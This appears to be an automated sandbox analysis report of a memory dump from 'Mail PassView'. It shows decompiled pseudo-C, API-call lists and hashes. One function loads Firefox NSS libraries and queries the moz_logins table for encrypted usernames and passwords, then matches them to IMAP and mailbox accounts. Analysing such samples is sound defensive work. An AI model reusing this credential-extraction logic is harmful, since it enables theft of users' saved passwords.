                                                                                              						_t276 = _t276 + 0xc;
                                                                                              						SetWindowTextA(_v48,  &_a80);
                                                                                              						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
                                                                                              						_v60 = _v60 + 0x14;
                                                                                              						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
                                                                                              						_v68 = _v68 + 1;
                                                                                              					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                                                              					goto L12;
                                                                                              				}
                                                                                              				_t223 = 0;
                                                                                              				_a32 = _a32 & 0;
                                                                                              				_a8 = 0;
                                                                                              				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
                                                                                              					L8:
                                                                                              					_t224 = _t223 - _t240;
                                                                                              					_a28 = _a28 - _t224;
                                                                                              					_a60.x = _a60.x + _t224;
                                                                                              					_t240 = _t240 + _t224;
                                                                                              					ReleaseDC( *(_t274 + 4), _a16);
                                                                                              					goto L9;
                                                                                              				}
                                                                                              				_v0 = _a12 + 0x10;
                                                                                              				do {
                                                                                              					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
                                                                                              						_t235 = _a100.x + 0xa;
                                                                                              						if(_t235 > _v8) {
                                                                                              							_v8 = _t235;
                                                                                              						}
                                                                                              					}
                                                                                              					_a16 =  &(_a16->i);
                                                                                              					_v16 = _v16 + 0x14;
                                                                                              				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                                                              				_t223 = _v8;
                                                                                              				goto L8;
                                                                                              			}


























                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                              • API String ID: 1703216249-3046471546
                                                                                              • Opcode ID: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                                              • Instruction ID: 2f6da9a5868e125b8128a3bf626dfa5428397bb468519cd7ccc35e9b597c58da
                                                                                              • Opcode Fuzzy Hash: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                                              • Instruction Fuzzy Hash: C9B1DE71108341AFD710DFA8C985A6BBBE9FF88704F008A2DF699D2260D775E814CF16
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 84%
                                                                                              			E004010E5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                              				struct tagPOINT _v12;
                                                                                              				void* __esi;
                                                                                              				void* _t47;
                                                                                              				struct HBRUSH__* _t56;
                                                                                              				void* _t61;
                                                                                              				unsigned int _t62;
                                                                                              				void* _t67;
                                                                                              				struct HWND__* _t68;
                                                                                              				struct HWND__* _t69;
                                                                                              				void* _t72;
                                                                                              				unsigned int _t73;
                                                                                              				struct HWND__* _t75;
                                                                                              				struct HWND__* _t76;
                                                                                              				struct HWND__* _t77;
                                                                                              				struct HWND__* _t78;
                                                                                              				unsigned int _t83;
                                                                                              				struct HWND__* _t85;
                                                                                              				struct HWND__* _t87;
                                                                                              				struct HWND__* _t88;
                                                                                              				struct tagPOINT _t94;
                                                                                              				struct tagPOINT _t96;
                                                                                              				void* _t102;
                                                                                              				void* _t113;
                                                                                              
                                                                                              				_t102 = __edx;
                                                                                              				_push(__ecx);
                                                                                              				_push(__ecx);
                                                                                              				_t47 = _a4 - 0x110;
                                                                                              				_t113 = __ecx;
                                                                                              				if(_t47 == 0) {
                                                                                              					__eflags =  *0x417348;
                                                                                              					if(__eflags != 0) {
                                                                                              						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x417348);
                                                                                              					} else {
                                                                                              						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
                                                                                              						ShowWindow(GetDlgItem( *(_t113 + 4), 0x3ee), 0);
                                                                                              					}
                                                                                              					SetWindowTextA( *(_t113 + 4), "Mail PassView");
                                                                                              					SetDlgItemTextA( *(_t113 + 4), 0x3ea, _t113 + 0xc);
                                                                                              					SetDlgItemTextA( *(_t113 + 4), 0x3ec, _t113 + 0x10b);
                                                                                              					E00401085(_t113, __eflags);
                                                                                              					E00406491(_t102,  *(_t113 + 4));
                                                                                              					goto L29;
                                                                                              				} else {
                                                                                              					_t61 = _t47 - 1;
                                                                                              					if(_t61 == 0) {
                                                                                              						_t62 = _a8;
                                                                                              						__eflags = _t62 - 1;
                                                                                              						if(_t62 != 1) {
                                                                                              							goto L29;
                                                                                              						} else {
                                                                                              							__eflags = _t62 >> 0x10;
                                                                                              							if(_t62 >> 0x10 != 0) {
                                                                                              								goto L29;
                                                                                              							} else {
                                                                                              								EndDialog( *(__ecx + 4), 1);
                                                                                              								DeleteObject( *(_t113 + 0x20c));
                                                                                              								goto L8;
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t67 = _t61 - 0x27;
                                                                                              						if(_t67 == 0) {
                                                                                              							_t68 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                                              							__eflags = _a12 - _t68;
                                                                                              							if(_a12 != _t68) {
                                                                                              								__eflags =  *0x417388;
                                                                                              								if( *0x417388 == 0) {
                                                                                              									goto L29;
                                                                                              								} else {
                                                                                              									_t69 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                                                              									__eflags = _a12 - _t69;
                                                                                              									if(_a12 != _t69) {
                                                                                              										goto L29;
                                                                                              									} else {
                                                                                              										goto L18;
                                                                                              									}
                                                                                              								}
                                                                                              							} else {
                                                                                              								L18:
                                                                                              								SetBkMode(_a8, 1);
                                                                                              								SetTextColor(_a8, 0xc00000);
                                                                                              								_t56 = GetSysColorBrush(0xf);
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t72 = _t67 - 0xc8;
                                                                                              							if(_t72 == 0) {
                                                                                              								_t73 = _a12;
                                                                                              								_t94 = _t73 & 0x0000ffff;
                                                                                              								_v12.x = _t94;
                                                                                              								_v12.y = _t73 >> 0x10;
                                                                                              								_t75 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                                              								_push(_v12.y);
                                                                                              								_a8 = _t75;
                                                                                              								_t76 = ChildWindowFromPoint( *(_t113 + 4), _t94);
                                                                                              								__eflags = _t76 - _a8;
                                                                                              								if(_t76 != _a8) {
                                                                                              									__eflags =  *0x417388;
                                                                                              									if( *0x417388 == 0) {
                                                                                              										goto L29;
                                                                                              									} else {
                                                                                              										_t77 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                                                              										_push(_v12.y);
                                                                                              										_t78 = ChildWindowFromPoint( *(_t113 + 4), _v12.x);
                                                                                              										__eflags = _t78 - _t77;
                                                                                              										if(_t78 != _t77) {
                                                                                              											goto L29;
                                                                                              										} else {
                                                                                              											goto L13;
                                                                                              										}
                                                                                              									}
                                                                                              								} else {
                                                                                              									L13:
                                                                                              									SetCursor(LoadCursorA( *0x416b94, 0x67));
                                                                                              									goto L8;
                                                                                              								}
                                                                                              							} else {
                                                                                              								if(_t72 != 0) {
                                                                                              									L29:
                                                                                              									_t56 = 0;
                                                                                              									__eflags = 0;
                                                                                              								} else {
                                                                                              									_t83 = _a12;
                                                                                              									_t96 = _t83 & 0x0000ffff;
                                                                                              									_v12.x = _t96;
                                                                                              									_v12.y = _t83 >> 0x10;
                                                                                              									_t85 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                                              									_push(_v12.y);
                                                                                              									_a8 = _t85;
                                                                                              									if(ChildWindowFromPoint( *(_t113 + 4), _t96) != _a8) {
                                                                                              										__eflags =  *0x417388;
                                                                                              										if( *0x417388 == 0) {
                                                                                              											goto L29;
                                                                                              										} else {
                                                                                              											_t87 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                                                              											_push(_v12.y);
                                                                                              											_t88 = ChildWindowFromPoint( *(_t113 + 4), _v12);
                                                                                              											__eflags = _t88 - _t87;
                                                                                              											if(_t88 != _t87) {
                                                                                              												goto L29;
                                                                                              											} else {
                                                                                              												_push(0x417388);
                                                                                              												goto L7;
                                                                                              											}
                                                                                              										}
                                                                                              									} else {
                                                                                              										_push(_t113 + 0x10b);
                                                                                              										L7:
                                                                                              										_push( *(_t113 + 4));
                                                                                              										E00406523();
                                                                                              										L8:
                                                                                              										_t56 = 1;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return _t56;
                                                                                              			}

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObject
                                                                                              • String ID: Mail PassView
                                                                                              • API String ID: 3628558512-272225179
                                                                                              • Opcode ID: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                                              • Instruction ID: a5e01e197ecdabf9e6bdb75eaf1794657044b10619e6b9182d208ef804a260cb
                                                                                              • Opcode Fuzzy Hash: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                                              • Instruction Fuzzy Hash: 68518130044248BFEB259F60DE85EAE7BB5EB04700F10853AFA56E65F0C7759D61EB08
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 73%
                                                                                              			E0040CE28(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
                                                                                              				char* _v8;
                                                                                              				int _v12;
                                                                                              				char* _v16;
                                                                                              				char* _v20;
                                                                                              				char* _v24;
                                                                                              				int* _v28;
                                                                                              				char* _v32;
                                                                                              				int _v36;
                                                                                              				intOrPtr _v44;
                                                                                              				intOrPtr _v48;
                                                                                              				intOrPtr _v64;
                                                                                              				intOrPtr _v68;
                                                                                              				char _v72;
                                                                                              				char _v76;
                                                                                              				void _v331;
                                                                                              				int _v332;
                                                                                              				void _v587;
                                                                                              				int _v588;
                                                                                              				void _v851;
                                                                                              				char _v852;
                                                                                              				void _v1378;
                                                                                              				short _v1380;
                                                                                              				void _v1995;
                                                                                              				char _v1996;
                                                                                              				void _v2611;
                                                                                              				char _v2612;
                                                                                              				char _v3636;
                                                                                              				char _v4660;
                                                                                              				char _v5684;
                                                                                              				char _v6708;
                                                                                              				char _v7732;
                                                                                              				void _v8755;
                                                                                              				char _v8756;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int _t115;
                                                                                              				signed int _t116;
                                                                                              				int _t118;
                                                                                              				void* _t130;
                                                                                              				char* _t170;
                                                                                              				intOrPtr _t175;
                                                                                              				char* _t177;
                                                                                              				int _t196;
                                                                                              				intOrPtr _t226;
                                                                                              				void* _t229;
                                                                                              				int* _t232;
                                                                                              				char* _t235;
                                                                                              				void* _t237;
                                                                                              				void* _t238;
                                                                                              				void* _t239;
                                                                                              				void* _t240;
                                                                                              
                                                                                              				E004118A0(0x2234, __ecx);
                                                                                              				_t226 = _a4;
                                                                                              				_t232 = _t226 + 0x30;
                                                                                              				_v28 = _t232;
                                                                                              				_t115 = E0040DEEE(_t232, _t226 + 0x362);
                                                                                              				if(_t115 == 0) {
                                                                                              					L43:
                                                                                              					return _t115;
                                                                                              				}
                                                                                              				_t116 = _t232[1];
                                                                                              				_t196 = 0;
                                                                                              				if(_t116 == 0) {
                                                                                              					_t115 = _t116 | 0xffffffff;
                                                                                              				} else {
                                                                                              					_t115 =  *_t116(_t226 + 0x158);
                                                                                              				}
                                                                                              				if(_t115 != _t196) {
                                                                                              					L41:
                                                                                              					if( *_t232 == _t196) {
                                                                                              						goto L43;
                                                                                              					}
                                                                                              					_t118 = SetCurrentDirectoryA( &(_t232[8]));
                                                                                              					 *_t232 = _t196;
                                                                                              					return _t118;
                                                                                              				} else {
                                                                                              					_v36 = _t196;
                                                                                              					if(E0040F64B( &_v72, _t226 + 0x362) == 0) {
                                                                                              						L39:
                                                                                              						_t232 = _v28;
                                                                                              						_t115 = _t232[2];
                                                                                              						if(_t115 != _t196) {
                                                                                              							_t115 =  *_t115();
                                                                                              						}
                                                                                              						goto L41;
                                                                                              					} else {
                                                                                              						_v12 = _t196;
                                                                                              						_v1380 = _t196;
                                                                                              						memset( &_v1378, _t196, 0x208);
                                                                                              						_v852 = _t196;
                                                                                              						memset( &_v851, _t196, 0x104);
                                                                                              						_t239 = _t238 + 0x18;
                                                                                              						MultiByteToWideChar(_t196, _t196, _a8, 0xffffffff,  &_v1380, 0x104);
                                                                                              						WideCharToMultiByte(0xfde9, _t196,  &_v1380, 0xffffffff,  &_v852, 0x104, _t196, _t196);
                                                                                              						if(_v72 != _t196) {
                                                                                              							_v72( &_v852,  &_v12);
                                                                                              						}
                                                                                              						if(_v12 == _t196) {
                                                                                              							goto L39;
                                                                                              						}
                                                                                              						_a8 = _t196;
                                                                                              						if(_v68 != _t196) {
                                                                                              							_v68(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v76);
                                                                                              							_t239 = _t239 + 0x14;
                                                                                              						}
                                                                                              						L11:
                                                                                              						if(_v64 == _t196) {
                                                                                              							_t130 = 0xffff;
                                                                                              						} else {
                                                                                              							_t130 = _v64(_a8);
                                                                                              						}
                                                                                              						if(_t130 != 0x64) {
                                                                                              							goto L34;
                                                                                              						}
                                                                                              						_v8756 = _t196;
                                                                                              						memset( &_v8755, _t196, 0x3ff);
                                                                                              						memset( &_v7732, _t196, 0x1400);
                                                                                              						_t240 = _t239 + 0x18;
                                                                                              						_t235 = E0040F7EE( &_v72, _a8, 1);
                                                                                              						_v20 = E0040F7EE( &_v72, _a8, 6);
                                                                                              						_v8 = E0040F7EE( &_v72, _a8, 7);
                                                                                              						_v24 = E0040F7EE( &_v72, _a8, 4);
                                                                                              						_v32 = E0040F7EE( &_v72, _a8, 5);
                                                                                              						_v16 = E0040F7EE( &_v72, _a8, 2);
                                                                                              						if(_t235 != _t196) {
                                                                                              							strcpy( &_v8756, _t235);
                                                                                              						}
                                                                                              						if(_v20 != _t196) {
                                                                                              							strcpy( &_v7732, _v20);
                                                                                              						}
                                                                                              						if(_v8 != _t196) {
                                                                                              							strcpy( &_v6708, _v8);
                                                                                              						}
                                                                                              						if(_v24 != _t196) {
                                                                                              							strcpy( &_v5684, _v24);
                                                                                              						}
                                                                                              						if(_v32 != _t196) {
                                                                                              							strcpy( &_v4660, _v32);
                                                                                              						}
                                                                                              						if(_v16 != _t196) {
                                                                                              							strcpy( &_v3636, _v16);
                                                                                              						}
                                                                                              						_v332 = _t196;
                                                                                              						memset( &_v331, _t196, 0xff);
                                                                                              						_v588 = _t196;
                                                                                              						memset( &_v587, _t196, 0xff);
                                                                                              						_t239 = _t240 + 0x18;
                                                                                              						E0040CD27(_v8, _t226,  &_v588);
                                                                                              						E0040CD27(_v20, _t226,  &_v332);
                                                                                              						_v8 = _t196;
                                                                                              						if( *((intOrPtr*)(_t226 + 0x474)) > _t196) {
                                                                                              							_v16 = _t226 + 0x468;
                                                                                              							do {
                                                                                              								_t237 = E0040D438(_v8, _v16);
                                                                                              								_v2612 = _t196;
                                                                                              								memset( &_v2611, _t196, 0x261);
                                                                                              								_v1996 = _t196;
                                                                                              								memset( &_v1995, _t196, 0x261);
                                                                                              								_t86 = _t237 + 0x104; // 0x104
                                                                                              								_t229 = _t86;
                                                                                              								sprintf( &_v2612, "mailbox://%s", _t229);
                                                                                              								sprintf( &_v1996, "imap://%s", _t229);
                                                                                              								_push( &_v3636);
                                                                                              								_t170 =  &_v2612;
                                                                                              								_push(_t170);
                                                                                              								L004115B2();
                                                                                              								_t239 = _t239 + 0x38;
                                                                                              								if(_t170 == 0) {
                                                                                              									L31:
                                                                                              									_t94 = _t237 + 0x304; // 0x304
                                                                                              									E004060D0(0xff, _t94,  &_v588);
                                                                                              									_t96 = _t237 + 0x204; // 0x204
                                                                                              									E004060D0(0xff, _t96,  &_v332);
                                                                                              									_t196 = 0;
                                                                                              									goto L32;
                                                                                              								}
                                                                                              								_push( &_v3636);
                                                                                              								_t177 =  &_v1996;
                                                                                              								_push(_t177);
                                                                                              								L004115B2();
                                                                                              								if(_t177 != 0) {
                                                                                              									goto L32;
                                                                                              								}
                                                                                              								goto L31;
                                                                                              								L32:
                                                                                              								_v8 =  &(_v8[1]);
                                                                                              								_t175 = _a4;
                                                                                              							} while (_v8 <  *((intOrPtr*)(_t175 + 0x474)));
                                                                                              							_t226 = _t175;
                                                                                              						}
                                                                                              						goto L11;
                                                                                              						L34:
                                                                                              						if(_a8 != _t196 && _v48 != _t196) {
                                                                                              							_v48(_a8);
                                                                                              						}
                                                                                              						if(_v44 != _t196) {
                                                                                              							_v44(_v12);
                                                                                              						}
                                                                                              						goto L39;
                                                                                              					}
                                                                                              				}
                                                                                              			}
                                                                                              0x00000000
                                                                                              0x0040d190
                                                                                              0x0040d190
                                                                                              0x0040d193
                                                                                              0x0040d199
                                                                                              0x0040d1a5
                                                                                              0x0040d1a5
                                                                                              0x00000000
                                                                                              0x0040d1ac
                                                                                              0x0040d1af
                                                                                              0x0040d1b9
                                                                                              0x0040d1bc
                                                                                              0x0040d1c0
                                                                                              0x0040d1c5
                                                                                              0x0040d1c8
                                                                                              0x00000000
                                                                                              0x0040d1c0
                                                                                              0x0040ce89

                                                                                              APIs
                                                                                                • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF0F
                                                                                                • Part of subcall function 0040DEEE: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                                                • Part of subcall function 0040DEEE: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                                                • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF62
                                                                                                • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF6C
                                                                                                • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF7A
                                                                                                • Part of subcall function 0040DEEE: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                                                • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                                                • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                                              • memset.MSVCRT ref: 0040CEA6
                                                                                              • memset.MSVCRT ref: 0040CEBF
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D314,000000FF,?,00000104,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CED6
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CEF5
                                                                                              • memset.MSVCRT ref: 0040CF68
                                                                                              • memset.MSVCRT ref: 0040CF7A
                                                                                              • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040CFED
                                                                                              • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D003
                                                                                              • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D019
                                                                                              • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D02F
                                                                                              • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D045
                                                                                              • strcpy.MSVCRT(?,0040D314,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D05B
                                                                                              • memset.MSVCRT ref: 0040D076
                                                                                              • memset.MSVCRT ref: 0040D08A
                                                                                              • memset.MSVCRT ref: 0040D0ED
                                                                                              • memset.MSVCRT ref: 0040D101
                                                                                              • sprintf.MSVCRT ref: 0040D119
                                                                                              • sprintf.MSVCRT ref: 0040D12B
                                                                                              • _stricmp.MSVCRT(?,?,?,imap://%s,00000104,?,mailbox://%s,00000104,?,00000000,00000261,?,00000000,00000261,?,?), ref: 0040D13E
                                                                                              • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040D158
                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040D1DD
                                                                                              Strings
                                                                                              • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040CF2B
                                                                                              • imap://%s, xrefs: 0040D125
                                                                                              • mailbox://%s, xrefs: 0040D113
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$AddressProcstrcpy$CurrentDirectory$ByteCharLibraryLoadMultiWide_stricmpsprintfstrlen$HandleModule
                                                                                              • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s
                                                                                              • API String ID: 4276617627-3913509535
                                                                                              • Opcode ID: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                                              • Instruction ID: 531ad7aca3640aed267cd003a13377454315b37e4b42da830508d09ae9ff7478
                                                                                              • Opcode Fuzzy Hash: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                                              • Instruction Fuzzy Hash: 58B10A72C00219ABDB20EFA5CC819DEB7BDEF04315F1445BBE619B2191DB38AB858F54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 76%
                                                                                              			E0040A774(intOrPtr __ecx, void* __eflags) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				struct HMENU__* _t121;
                                                                                              				struct HWND__* _t122;
                                                                                              				intOrPtr _t128;
                                                                                              				int _t133;
                                                                                              				intOrPtr _t135;
                                                                                              				int _t149;
                                                                                              				void* _t166;
                                                                                              				void* _t174;
                                                                                              				void* _t178;
                                                                                              				void* _t185;
                                                                                              				intOrPtr _t194;
                                                                                              				void* _t197;
                                                                                              				void* _t198;
                                                                                              				intOrPtr _t200;
                                                                                              				intOrPtr _t201;
                                                                                              				void* _t202;
                                                                                              				int _t204;
                                                                                              				intOrPtr _t205;
                                                                                              				intOrPtr* _t207;
                                                                                              				intOrPtr* _t208;
                                                                                              				void* _t210;
                                                                                              				intOrPtr* _t211;
                                                                                              				void* _t213;
                                                                                              
                                                                                              				_t213 = __eflags;
                                                                                              				_t208 = _t210 - 0x78;
                                                                                              				_t211 = _t210 - 0xb8;
                                                                                              				 *((intOrPtr*)(_t208 + 0x70)) = __ecx;
                                                                                              				 *((char*)(_t208 - 0x37)) = 1;
                                                                                              				 *(_t208 - 0x40) = 0;
                                                                                              				 *((intOrPtr*)(_t208 - 0x3c)) = 0;
                                                                                              				 *((char*)(_t208 - 0x38)) = 0;
                                                                                              				 *((char*)(_t208 - 0x36)) = 0;
                                                                                              				 *((char*)(_t208 - 0x35)) = 0;
                                                                                              				asm("stosd");
                                                                                              				asm("stosd");
                                                                                              				 *(_t208 - 0x2c) = 1;
                                                                                              				 *((intOrPtr*)(_t208 - 0x28)) = 0x9c41;
                                                                                              				 *((char*)(_t208 - 0x24)) = 4;
                                                                                              				 *((char*)(_t208 - 0x23)) = 0;
                                                                                              				 *((char*)(_t208 - 0x22)) = 0;
                                                                                              				 *((char*)(_t208 - 0x21)) = 0;
                                                                                              				asm("stosd");
                                                                                              				asm("stosd");
                                                                                              				 *((intOrPtr*)(_t208 - 0x18)) = 5;
                                                                                              				 *((intOrPtr*)(_t208 - 0x14)) = 0x9c44;
                                                                                              				 *((char*)(_t208 - 0x10)) = 4;
                                                                                              				 *((char*)(_t208 - 0xf)) = 0;
                                                                                              				 *((char*)(_t208 - 0xe)) = 0;
                                                                                              				 *((char*)(_t208 - 0xd)) = 0;
                                                                                              				asm("stosd");
                                                                                              				asm("stosd");
                                                                                              				 *(_t208 - 4) = 2;
                                                                                              				 *_t208 = 0x9c48;
                                                                                              				 *((char*)(_t208 + 4)) = 4;
                                                                                              				 *((char*)(_t208 + 5)) = 0;
                                                                                              				 *((char*)(_t208 + 6)) = 0;
                                                                                              				 *((char*)(_t208 + 7)) = 0;
                                                                                              				asm("stosd");
                                                                                              				asm("stosd");
                                                                                              				 *((intOrPtr*)(_t208 + 0x10)) = 3;
                                                                                              				 *((intOrPtr*)(_t208 + 0x14)) = 0x9c49;
                                                                                              				 *((char*)(_t208 + 0x18)) = 4;
                                                                                              				 *((char*)(_t208 + 0x19)) = 0;
                                                                                              				 *((char*)(_t208 + 0x1a)) = 0;
                                                                                              				 *((char*)(_t208 + 0x1b)) = 0;
                                                                                              				asm("stosd");
                                                                                              				asm("stosd");
                                                                                              				 *((intOrPtr*)(_t208 + 0x24)) = 0;
                                                                                              				 *((intOrPtr*)(_t208 + 0x28)) = 0x9c4e;
                                                                                              				 *((char*)(_t208 + 0x2c)) = 4;
                                                                                              				 *((char*)(_t208 + 0x2d)) = 0;
                                                                                              				 *((char*)(_t208 + 0x2e)) = 0;
                                                                                              				 *((char*)(_t208 + 0x2f)) = 0;
                                                                                              				asm("stosd");
                                                                                              				asm("stosd");
                                                                                              				 *((intOrPtr*)(_t208 + 0x38)) = 6;
                                                                                              				 *((intOrPtr*)(_t208 + 0x3c)) = 0x9c56;
                                                                                              				 *((char*)(_t208 + 0x40)) = 4;
                                                                                              				 *((char*)(_t208 + 0x41)) = 0;
                                                                                              				 *((char*)(_t208 + 0x42)) = 0;
                                                                                              				 *((char*)(_t208 + 0x43)) = 0;
                                                                                              				asm("stosd");
                                                                                              				asm("stosd");
                                                                                              				 *((intOrPtr*)(_t208 + 0x4c)) = 4;
                                                                                              				 *((intOrPtr*)(_t208 + 0x50)) = 0x9c42;
                                                                                              				 *((char*)(_t208 + 0x54)) = 4;
                                                                                              				 *((char*)(_t208 + 0x55)) = 0;
                                                                                              				 *((char*)(_t208 + 0x56)) = 0;
                                                                                              				 *((char*)(_t208 + 0x57)) = 0;
                                                                                              				 *(_t208 + 0x6c) =  *(_t208 + 0x6c) | 0xffffffff;
                                                                                              				asm("stosd");
                                                                                              				_t198 = 0x66;
                                                                                              				asm("stosd");
                                                                                              				_t121 = E00407BB9(_t198);
                                                                                              				_t194 =  *((intOrPtr*)(_t208 + 0x70));
                                                                                              				 *(_t194 + 0x11c) = _t121;
                                                                                              				_t122 = SetMenu( *(_t194 + 0x108), _t121);
                                                                                              				__imp__#6(0x50000000, 0x412466,  *(_t194 + 0x108), 0x101, _t185, _t197, _t166);
                                                                                              				 *(_t194 + 0x114) = _t122;
                                                                                              				SendMessageA(_t122, 0x404, 1, _t208 + 0x6c);
                                                                                              				 *((intOrPtr*)(_t194 + 0x118)) = CreateToolbarEx( *(_t194 + 0x108), 0x50010900, 0x102, 7, 0, LoadImageA( *0x416b94, 0x68, 0, 0, 0, 0x9060), _t208 - 0x40, 8, 0x10, 0x10, 0x70, 0x10, 0x14);
                                                                                              				E004023D4( *((intOrPtr*)(_t194 + 0x370)), _t213, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t194 + 0x108), 0x103,  *0x416b94, 0), 1);
                                                                                              				_t128 =  *((intOrPtr*)(_t194 + 0x370));
                                                                                              				_t173 =  *((intOrPtr*)(_t128 + 0x1b0));
                                                                                              				_t200 =  *((intOrPtr*)(_t128 + 0x1b4));
                                                                                              				 *((intOrPtr*)(_t208 + 0x68)) =  *((intOrPtr*)(_t128 + 0x184));
                                                                                              				if(_t173 <= 0) {
